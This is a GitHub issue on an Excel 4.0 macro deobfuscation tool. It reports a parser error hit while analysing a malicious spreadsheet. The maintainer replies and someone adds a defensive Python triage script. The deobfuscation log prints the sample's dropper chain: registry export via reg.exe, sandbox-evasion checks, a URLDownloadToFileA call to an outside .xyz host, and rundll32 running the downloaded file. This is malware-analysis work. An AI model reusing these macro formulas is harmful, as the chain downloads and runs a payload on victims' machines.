DissectMalware / XLMMacroDeobfuscator

Extract and Deobfuscate XLM macros (a.k.a Excel 4.0 Macros)
Apache License 2.0

Error [deobfuscator.py:2433.... #77

Open JA1E0 opened 3 years ago

JA1E0 commented 3 years ago

When analyzing a malicious document with version 0.1.4, analysis proceeds until...

XLMMacroDeobfuscator(v0.1.7) - https://github.com/DissectMalware/XLMMacroDeobfuscator

File: sample2-b5d469a07709b5ca6fee934b1e5e8e38.bin

Unencrypted xls file

[Loading Cells]
SHRFMLA (sub): 0 0 1 8 6
SHRFMLA (sub): 9 9 1 8 8
SHRFMLA (sub): 19 19 1 7 7
SHRFMLA (sub): 26 26 0 7 8
auto_open: auto_open->'CSHykdYHvi'!$J$727
[Starting Deobfuscation]
CELL:J727 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","EXPORT HKCU\Software\Microsoft\Office\GET.WORKSPACE(2)\Excel\Security c:\users\public\1.reg /y",0,5)
CELL:J728 , PartialEvaluation , =WAIT("2021-02-20 14:47:40.575765")
CELL:J729 , FullEvaluation , FOPEN("c:\users\public\1.reg",1)
CELL:J730 , PartialEvaluation , =FPOS(FOPEN("c:\users\public\1.reg",1),215)
CELL:J732 , PartialEvaluation , =FCLOSE(FOPEN("c:\users\public\1.reg",1))
CELL:J733 , PartialEvaluation , =FILE.DELETE("c:\users\public\1.reg")
CELL:J734 , Branching , IF(ISNUMBER(SEARCH("0001",J731)),CLOSE(FALSE),GOTO(J1))
CELL:J734 , FullEvaluation , [FALSE] GOTO(J1)
CELL:J1 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(13)<770, CLOSE(FALSE),)",K2)
CELL:J2 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(14)<381, CLOSE(FALSE),)",K4)
CELL:J4 , FullEvaluation , FORMULA("=SHARED FMLA at rowx=0 colx=1IF(GET.WORKSPACE(19),,CLOSE(TRUE))",K5)
CELL:J5 , FullEvaluation , FORMULA("=SHARED FMLA at rowx=0 colx=1IF(GET.WORKSPACE(42),,CLOSE(TRUE))",K6)
CELL:J6 , FullEvaluation , FORMULA("=SHARED FMLA at rowx=0 colx=1IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))), ,CLOSE(TRUE))",K7)
CELL:J7 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,""https://ethelenecrace.xyz/fbb3"",""c:\Users\Public\bmjn5ef.html"",0,0)",K8)
CELL:J8 , FullEvaluation , FORMULA("=SHARED FMLA at rowx=0 colx=1ALERT(""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."",2)",K9)
CELL:J9 , FullEvaluation , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",""C:\Windows\system32\rundll32.exe"",""c:\Users\Public\bmjn5ef.html,DllRegisterServer"",0,5)",K11)
CELL:J11 , FullEvaluation , FORMULA("=SHARED FMLA at rowx=0 colx=1CLOSE(FALSE)",K12)
CELL:J12 , PartialEvaluation , =WORKBOOK.HIDE("CSHykdYHvi",TRUE)
CELL:J13 , FullEvaluation , GOTO(K2)
CELL:K2 , FullEvaluation , IF(GET.WORKSPACE(13)<770,CLOSE(FALSE),)
CELL:K4 , FullEvaluation , IF(GET.WORKSPACE(14)<381,CLOSE(FALSE),)
Error [deobfuscator.py:2433 parse_tree = self.xlm_parser.parse(formula)]: Unexpected token Token('NAME', 'FMLA') at line 1, column 9. Expected one of:

Files:

[END of Deobfuscation] time elapsed: 0.1893155574798584

sample MD5: b5d469a07709b5ca6fee934b1e5e8e38

DissectMalware commented 3 years ago

Seems like a problem in the xlrd2 parser (xls). It doesn't support parsing shared formulas. Will test soon.

https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-xls/984826cc-8bb7-412b-9907-7bbb9b08b4ad
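The failure above comes from xlrd2 handing the deobfuscator a placeholder ("SHARED FMLA at rowx=N colx=M") instead of the expanded shared-formula text, which the Lark grammar then rejects and the whole run stops. The following is an added example, not code from XLMMacroDeobfuscator or xlrd2, of a tolerant pre-pass a defender could run over the emitted formulas: it strips the placeholder (format assumed from the log in this issue), records where the shared formula came from, and keeps going while tagging the behaviours worth triaging (native DLL calls, GET.WORKSPACE environment checks, cells that write new formulas). The regexes and tag names are my own heuristics; the sample cells are copied from the log with the download URL and local path replaced by placeholders.

```python
import re

# Placeholder xlrd2 emits for a cell holding a shared formula it cannot expand
# (format assumed from the issue log: "SHARED FMLA at rowx=N colx=M").
SHARED_FMLA_RE = re.compile(r"SHARED FMLA at rowx=(\d+) colx=(\d+)")
# CALL("dll","export",...); quotes are doubled when the CALL sits inside a
# FORMULA("...") string literal, as in cell J7 of the log.
CALL_RE = re.compile(r'CALL\(\s*"+([^"]+)"+\s*,\s*"+([^"]+)"+')
ENV_CHECK_RE = re.compile(r"GET\.WORKSPACE\((\d+)\)")


def strip_shared_fmla(formula):
    """Drop the xlrd2 placeholder so the remaining XLM text is parseable.
    Returns (cleaned_formula, (rowx, colx)) or (formula, None) if absent."""
    m = SHARED_FMLA_RE.search(formula)
    if m is None:
        return formula, None
    cleaned = formula[:m.start()] + formula[m.end():]
    return cleaned, (int(m.group(1)), int(m.group(2)))


def triage(formula):
    """Tag one XLM formula with the behaviours a defender wants surfaced:
    native DLL calls, environment fingerprinting and self-modifying FORMULA()."""
    cleaned, origin = strip_shared_fmla(formula)
    tags = []
    if origin is not None:
        tags.append("shared-formula@rowx=%d,colx=%d" % origin)
    for dll, export in CALL_RE.findall(cleaned):
        tags.append("dll-call:%s!%s" % (dll, export))
    for num in ENV_CHECK_RE.findall(cleaned):
        tags.append("env-check:GET.WORKSPACE(%s)" % num)
    if re.search(r"\bFORMULA\(", cleaned):
        tags.append("writes-formula")
    return cleaned, tags


def triage_cells(cells):
    """Triage every (cell, formula) pair; a placeholder never aborts the run."""
    return {cell: triage(formula) for cell, formula in cells}


# Constructed sample: three formulas taken from the log in this issue, with the
# download URL and local path replaced by obvious placeholders.
SAMPLE_CELLS = [
    ("K4", "IF(GET.WORKSPACE(14)<381,CLOSE(FALSE),)"),
    ("J4", 'FORMULA("=SHARED FMLA at rowx=0 colx=1IF(GET.WORKSPACE(19),,CLOSE(TRUE))",K5)'),
    ("J7", 'FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,'
           '""https://PLACEHOLDER.invalid/x"",""c:\\PLACEHOLDER\\x.html"",0,0)",K8)'),
]
```

Running `triage_cells(SAMPLE_CELLS)` yields, for J4, the cleaned text `FORMULA("=IF(GET.WORKSPACE(19),,CLOSE(TRUE))",K5)` plus tags recording the shared-formula origin, the GET.WORKSPACE(19) check and the FORMULA write; the real fix still belongs in xlrd2's shared-formula expansion, this only keeps the analysis from stopping.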